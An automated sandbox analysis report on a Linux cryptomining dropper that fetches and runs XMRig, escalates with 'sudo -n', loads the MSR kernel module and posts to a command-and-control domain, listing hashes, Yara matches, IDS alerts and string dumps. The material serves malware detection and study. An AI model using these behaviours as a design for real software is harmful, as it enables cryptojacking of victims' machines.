Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
xmr_linux_amd64.elf

Overview

General Information

Sample name:xmr_linux_amd64.elf
Analysis ID:1512955
MD5:aff9d4675fdb21bb30e23ab1466b5841
SHA1:bed1388ccca38218fa67ac7670b0e13bf759702e
SHA256:5f3e06f187c4088882133251e9ee6a03e8f11c73354af3bd6fd7c010b46e78f0
Tags:botnetelflinuxminermoneroxmrxmrig
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Found Tor onion address
Found strings related to Crypto-Mining
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample reads /proc/mounts (often used for finding a writable filesystem)
Stdout / stderr contain strings indicative of a mining client
Tries to load the MSR kernel module used for reading/writing to CPUs model specific register
Writes to CPU model specific registers (MSR) (e.g. miners improve performance by disabling HW prefetcher)
Creates hidden files and/or directories
Creates hidden files without content (potentially used as a mutex)
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "modprobe" command used for loading kernel modules
Executes the "sudo" command used to execute a command as another user
May check the online IP address of the machine
Reads CPU information from /proc indicative of miner or evasive malware
Reads CPU information from /sys indicative of miner or evasive malware
Reads system information from the proc file system
Reads the 'hosts' file potentially containing internal network hosts
Sample has stripped symbol table
Sample tries to set the executable flag
Suricata IDS alerts with low severity for network traffic
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match

Classification

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1512955
Start date and time:2024-09-18 08:16:06 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 7m 28s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:xmr_linux_amd64.elf
Detection:MAL
Classification:mal100.troj.evad.mine.linELF@0/6@61/0

Warnings

  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: http://crl.certigna.fr/certignarootca.crl01
  • VT rate limit hit for: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl
  • VT rate limit hit for: http://ocsp.accv.es
  • VT rate limit hit for: http://policy.camerfirma.com0
  • VT rate limit hit for: http://www.accv.es00
  • VT rate limit hit for: http://www.cert.fnmt.es/dpcs/0
  • VT rate limit hit for: http://www.quovadis.bm0
  • VT rate limit hit for: https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz
  • VT rate limit hit for: https://ocsp.quovadisoffshore.com0
  • VT rate limit hit for: https://www.catcert.net/verarrel05
  • VT rate limit hit for: https://xmrig.com/benchmark/%s

Runtime Messages

Command:/tmp/xmr_linux_amd64.elf
PID:5411
Exit Code:
Exit Code Info:
Killed:True
Standard Output:
Error sending data to server: Post "https://vmtracker.freechildporninthisserver.lol/postgresqlstore": dial tcp: lookup vmtracker.freechildporninthisserver.lol on 127.0.0.53:53: read udp 127.0.0.1:47790->127.0.0.53:53: i/o timeout
Standard Error:2024/09/18 01:17:06 Downloading xmrig...
2024/09/18 01:17:14 Downloaded and extracted xmrig
2024/09/18 01:17:14 Patching json...
2024/09/18 01:17:15 Downloaded and configured config.json

Process Tree

  • system is lnxubuntu20
  • xmr_linux_amd64.elf (PID: 5411, Parent: 5337, MD5: aff9d4675fdb21bb30e23ab1466b5841) Arguments: /tmp/xmr_linux_amd64.elf
    • sudo (PID: 5427, Parent: 5411, MD5: eb8c10001fe28b9c4c2e42b96347f6db) Arguments: sudo -n true
      • sudo New Fork (PID: 5428, Parent: 5427)
      • true (PID: 5428, Parent: 5427, MD5: 589a58ff455dbd092cb3ba3dd2c4c63e) Arguments: true
    • sudo (PID: 5452, Parent: 5411, MD5: eb8c10001fe28b9c4c2e42b96347f6db) Arguments: sudo -n /tmp/xmrig/xmrig-6.21.3/xmrig
      • sudo New Fork (PID: 5453, Parent: 5452)
      • xmrig (PID: 5453, Parent: 5452, MD5: 7429d24207b100f6c164bf4703b5941e) Arguments: /tmp/xmrig/xmrig-6.21.3/xmrig
        • xmrig New Fork (PID: 5475, Parent: 5453)
        • sh (PID: 5475, Parent: 5453, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1"
          • sh New Fork (PID: 5476, Parent: 5475)
          • modprobe (PID: 5476, Parent: 5475, MD5: 0b44462b1a40df8039d6d61cfff7ea84) Arguments: /sbin/modprobe msr allow_writes=on
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XMRIGNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.xmrig

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    /tmp/xmrig/xmrig-6.21.3/config.jsonJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      /tmp/xmrig/xmrig-6.21.3/xmrigJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        /tmp/xmrig/xmrig-6.21.3/xmrigLinux_Trojan_Pornoasset_927f314funknownunknown
        • 0x209f98:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
        /tmp/xmrig/xmrig-6.21.3/xmrigMacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x5cc6c7:$a1: mining.set_target
        • 0x5cb909:$a2: XMRIG_HOSTNAME
        • 0x5e5db8:$a3: Usage: xmrig [OPTIONS]
        • 0x5cb8ea:$a4: XMRIG_VERSION

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        5411.1.000000c000000000.000000c000800000.rw-.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          Process Memory Space: xmr_linux_amd64.elf PID: 5411JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-18T08:17:17.195597+020020479282Crypto Currency Mining Activity Detected192.168.2.13400018.8.8.853UDP
            2024-09-18T08:17:17.195697+020020479282Crypto Currency Mining Activity Detected192.168.2.13580078.8.8.853UDP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for dropped file
            Source: /tmp/xmrig/xmrig-6.21.3/xmrigAvira: detection malicious, Label: ANDROID/AVE.Miner.nezaa
            Multi AV Scanner detection for submitted file
            Source: xmr_linux_amd64.elfReversingLabs: Detection: 28%
            Source: xmr_linux_amd64.elfVirustotal: Detection: 34%Perma Link
            Machine Learning detection for dropped file
            Source: /tmp/xmrig/xmrig-6.21.3/xmrigJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: xmr_linux_amd64.elfJoe Sandbox ML: detected

            Bitcoin Miner

            barindex
            Yara detected Xmrig cryptocurrency miner
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: 5411.1.000000c000000000.000000c000800000.rw-.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: xmr_linux_amd64.elf PID: 5411, type: MEMORYSTR
            Source: Yara matchFile source: /tmp/xmrig/xmrig-6.21.3/config.json, type: DROPPED
            Source: Yara matchFile source: /tmp/xmrig/xmrig-6.21.3/xmrig, type: DROPPED
            Found strings related to Crypto-Mining
            Source: xmrig.12.drString found in binary or memory: stratum+ssl://%s
            Source: xmrig.12.drString found in binary or memory: cryptonight/0
            Source: xmrig.12.drString found in binary or memory: -o, --url=URL URL of mining server
            Source: xmrig.12.drString found in binary or memory: stratum+tcp://
            Source: xmrig.12.drString found in binary or memory: Usage: xmrig [OPTIONS]
            Source: xmrig.12.drString found in binary or memory: XMRig 6.21.3
            Stdout / stderr contain strings indicative of a mining client
            Source: /tmp/xmr_linux_amd64.elfStderr: xmrig
            Tries to load the MSR kernel module used for reading/writing to CPUs model specific register
            Source: /bin/sh (PID: 5476)Modprobe: /sbin/modprobe -> /sbin/modprobe msr allow_writes=onJump to behavior
            Writes to CPU model specific registers (MSR) (e.g. miners improve performance by disabling HW prefetcher)
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)MSR open for writing: /dev/cpu/0/msrJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)MSR open for writing: /dev/cpu/1/msrJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_cpusJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/die_cpusJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/package_cpusJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/physical_package_idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_mapJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/levelJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/typeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/number_of_setsJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partitionJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_mapJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/levelJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/typeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_mapJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/levelJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/typeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/number_of_setsJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partitionJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_mapJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/levelJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/typeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/number_of_setsJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partitionJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_cpusJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/die_cpusJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/package_cpusJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/physical_package_idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/shared_cpu_mapJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/levelJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/typeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/coherency_line_sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/number_of_setsJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/physical_line_partitionJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/shared_cpu_mapJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/levelJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/typeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/shared_cpu_mapJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/levelJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/typeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/coherency_line_sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/number_of_setsJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/physical_line_partitionJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/shared_cpu_mapJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/levelJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/typeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/coherency_line_sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/number_of_setsJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/physical_line_partitionJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/possibleJump to behavior

            Networking

            barindex
            Found Tor onion address
            Source: xmr_linux_amd64.elfString found in binary or memory: cookieexpectoriginserverExpectstatusPragmasocks Lockedremovewaitidexec: sysmontimersefenceselect, not GOROOTobjectSundayMondayFridayAugustminutesecond390625CaviumNVIDIAAmperePOWER8POWER7uint16uint32uint64structchan<-<-chan Valuehangupkilled/proc/errno , val X25519%w%.0wtls13 AcceptServernetdnsdomaingophertelnetlisten.onionndots:ip+netsocketArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphensplicerdtscppopcntcmd/gouptimesystemvmwareopenvzcgroupdockerLISTENENOENTECHILDEAGAINENOMEMEACCESEFAULTEEXISTENODEVEISDIREINVALENFILEEMFILEENOTTYENOSPCESPIPEEMLINKERANGEENOLCKENOSYSENOMSGECHRNGEL3HLTEL3RSTELNRNGENOCSIEL2HLTEXFULLENOANOEBFONTENOSTRENONETENOPKGESRMNTEPROTOEBADFDEILSEQEUSERSESTALEEISNAMEDQUOTENOKEYSIGHUPSIGINTSIGILLSIGBUSSIGFPESIGURGSIGPWRSIGSYSempty rune1 TypeNSTypeMXheaderAnswerLengthonlineSTREETavx512rdrandrdseedunaliasfloat32float64UpgradeHEADERSTrailerReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUG:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECT (trap forcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningUNKNOWN:eventsTuesdayJanuaryOctoberenvironcmdline19531259765625cpuinfoFujitsuMarvellinvaliduintptrSwapperChanDir Value>Convertabortedstoppedsignal nil keyderivedInitialExpiresSubjectconnectlookup writetocharsetAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalavx512fos/execruntimemodulesvboxdrvCLOSINGENOEXECENOTBLKENOTDIRETXTBSYEDEADLKEUNATCHEBADRQCEBADSLTENODATAEREMOTEENOLINKEDOTDOTEBADMSGEREMCHGELIBACCELIBBADELIBSCNELIBMAXENOTSUPENOBUFSEISCONNEUCLEANENOTNAMENAVAILERFKILLSIGQUITSIGTRAPSIGABRTSIGKILLSIGUSR1SIGSEGVSIGUSR2SIGPIPESIGALRMSIGTERMSIGCHLDSIGCONTSIGSTOPSIGTSTPSIGTTINSIGTTOUSIGXCPUSIGXFSZSIGPROFInstAltInstNopalt -> nop -> any -> SHA-224SHA-256SHA-384SHA-512DES-CBCEd25519MD2-RSAMD5-RSAserial:::ffff:TypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLanswers2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5amxtileamxint8amxbf16osxsave#interni
            Source: xmr_linux_amd64.elfString found in binary or memory: bindunix.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2/sysrolevboxselfEDOMEADVcap -> failbitsTypeasn1cx16sse2xmrigcbashbash2amd64unamegnamemtimeatimectimeUSTARfalse<nil>Error&amp;&#34;&#39;https:***@Rangerangeclose:path%s %q%s=%sHTTP/socksFoundchdirwritemkdir$HOMEchmodlinuxgetwdpipe2lstatdefersweeptestRtestWexecWexecRschedhchansudoggscanmheaptracepanicsleepgcingfault[...]MarchAprilmonthLocalarray1562578125AppleIntelPOWERint16int32int64uint8slice$USERtls: Earlyparsefilesimap2imap3imapspop3shosts.avif.html.jpeg.json.wasm.webputf-8%s*%dtext/Realmbad nAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3/procbtimeguestVxID:CLOSEEPERMESRCHEINTRENXIOE2BIGEBADFEBUSYEXDEVEFBIGEROFSEPIPEELOOPEIDRMEBADEEBADRETIMEENOSRECOMMSIGIOmatchrune SHA-1P-224P-256P-384P-521ECDSA (at TypeAClassxmrig1helperpc784foracle/xmrigStringFormat[]bytestringClosedCANCELGOAWAYPADDEDactiveclosedsocks5Basic CookieacceptallowcookieexpectoriginserverExpectstatusPragmasocks Lockedremovewaitidexec: sysmontimersefenceselect, not GOROOTobjectSundayMondayFridayAugustminutesecond390625CaviumNVIDIAAmperePOWER8POWER7uint16uint32uint64structchan<-<-chan Valuehangupkilled/proc/errno , val X25519%w%.0wtls13 AcceptServernetdnsdomaingophertelnetlisten.onionndots:ip+netsocketArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphensplicerdtscppopcntcmd/gouptimesystemvmwareopenvzcgroupdockerLISTENENOENTECHILDEAGAINENOMEMEACCESEFAULTEEXISTENODEVEISDIREINVALENFILEEMFILEENOTTYENOSPCESPIPEEMLINKERANGEENOLCKENOSYSENOMSGECHRNGEL3HLTEL3RSTELNRNGENOCSIEL2HLTEXFULLENOANOEBFONTENOSTRENONETENOPKGESRMNTEPROTOEBADFDEILSEQEUSERSESTALEEISNAMEDQUOTENOKEYSIGHUPSIGINTSIGILLSIGBUSSIGFPESIGURGSIGPWRSIGSYSempty rune1 TypeNSTypeMXheaderAnswerLengthonlineSTREETavx512rdrandrdseedunaliasfloat32float64UpgradeHEADERSTrailerReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUG:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECT (trap forcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningUNKNOWN:eventsTuesdayJanuaryOctoberenvironcmdline19531259765625cpuinfoFujitsuMarvellinvaliduintptrSwapperChanDir Value>Convertabortedstoppedsignal nil keyderivedInitialExpiresSubjectconnectlookup writetocharsetAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalavx512fos/execruntimemodulesvboxdrvCLOSINGENOEXECENOTBLKENOTDIRETXTBSYEDEADLKEUNATCHEBADRQCEBADSLTENODATAEREMOTEENOLINKEDOTDOTEBADMSGEREMCHGELIBACCELIBBADELIBSCNELIBMAXENOTSUPENOBUFSEISCONNEUCLEANENOTNAMENAVAILERFKILLSIGQUITSIGTRAPSIGABRTSIGKILLSIGUSR1SIGSEGVSIGUSR2SIGPIPESIGALRMSIGTERMSIGCHLDSIGCONTSIGSTOPSIGTSTPSIGTTINSIGTTOUSIGXCPUSIGXFSZSIGPROFInstAltInstNopalt -> nop -> any -> SHA-224SHA-256SHA-384SHA-512DES-CBCEd25519MD2-RSAMD5-RSAse
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)Reads hosts file: /etc/hostsJump to behavior
            Source: /usr/bin/sudo (PID: 5427)Reads hosts file: /etc/hostsJump to behavior
            Source: /usr/bin/sudo (PID: 5452)Reads hosts file: /etc/hostsJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads hosts file: /etc/hostsJump to behavior
            Source: Network trafficSuricata IDS: 2047928 - Severity 2 - ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com) : 192.168.2.13:40001 -> 8.8.8.8:53
            Source: Network trafficSuricata IDS: 2047928 - Severity 2 - ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com) : 192.168.2.13:58007 -> 8.8.8.8:53
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
